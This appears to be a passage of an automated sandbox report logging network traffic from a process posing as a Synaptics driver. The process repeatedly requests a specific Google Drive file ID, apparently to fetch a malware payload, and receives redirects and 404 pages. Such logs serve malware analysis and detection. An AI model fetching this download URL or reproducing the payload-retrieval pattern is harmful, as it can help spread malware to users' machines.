                                                                                                                                                                            48192.168.2.849798142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7ZUhcsjEytEFHWrG3I0SdpxD0KO-40Cc7SRMLcpzLGzODKCS7p60GbJfckwSAlpWANXNoXtRc
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-lGIG7fO2dqmaWCC0lF13cw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:24 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:24 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 6b 51 32 36 71 5f 59 61 48 4a 47 62 54 46 67 41 58 46 75 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="ukQ26q_YaHJGbTFgAXFuPg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:24 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            49192.168.2.849799142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:24 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:24 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-dZFH7y1nSaA1hyR7qGc77Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            50192.168.2.849797142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:24 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC4WM7Hae0nWn28ohK6_l7PPfgLiFuBp4fLO4YgQgLCx5gO2D20h4C-0BfvLOWKRnyDi
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:24 GMT
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-XXLu693lqBJwszJBuR606w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:25 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                            2024-12-30 10:49:25 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 74 36 71 4b 6f 37 4a 37 76 79 66 42 33 48 47 32 63 49 30 68 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                            Data Ascii: t Found)!!1</title><style nonce="t6qKo7J7vyfB3HG2cI0htQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                            2024-12-30 10:49:25 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            51192.168.2.849804142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC42U7NeHeFEeUozfXoOpuK3ch8O996UDbnt9ABbknjUy-Xwup_fDByBMzqBaIUi57xeE6MZv-0
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-vu6-CYJq0P4K0K2zFZJ82w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
                                                                                                                                                                            2024-12-30 10:49:25 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                            2024-12-30 10:49:25 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 34 70 39 41 5a 70 7a 4b 67 5f 6d 64 61 75 72 58 5a 66 6e 44 7a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                            Data Ascii: 404 (Not Found)!!1</title><style nonce="4p9AZpzKg_mdaurXZfnDzQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                            2024-12-30 10:49:25 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                            Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            52192.168.2.849802142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-s-QOrc8ulC_Ootpwf8qulQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            53192.168.2.849803142.250.185.784437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:25 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Host: docs.google.com
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:25 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                            Content-Type: application/binary
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-UM9OOvqi1hVir8aE4kiqew' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Server: ESF
                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Connection: close


                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                            54192.168.2.849805142.250.185.1614437732C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                            2024-12-30 10:49:25 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                            User-Agent: Synaptics.exe
                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                            Host: drive.usercontent.google.com
                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                            Cookie: NID=520=DQJ5ABr0a-d43HoecsiLoU-BgkACr6XrZ5rHqbcBm6x4d28TeikkHE12p5UsluAt2nvVPG096_0QaVzEat0XeRVzY_UOaJEmGeWL3J4cAybFAS-yoT-Lj6GdWVtZrDYkaWrSUjUjiQwdp2kOcwZ_aKZ8IFXAq8evrmrLGTfHflR7WHOJIKODplM
                                                                                                                                                                            2024-12-30 10:49:26 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                            X-GUploader-UploadID: AFiumC7NKr3rOUZ5PV0WHzbq-Yjpg8ODmdzf2lAMcwsqR8jHZEC81RsYuccd4olCf1fERXjy
                                                                                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                            Date: Mon, 30 Dec 2024 10:49:25 GMT
                                                                                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-tCMGV9BrQYBhoDwkSkef2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                            Content-Length: 1652
                                                                                                                                                                            Server: UploadServer
                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                            Connection: close
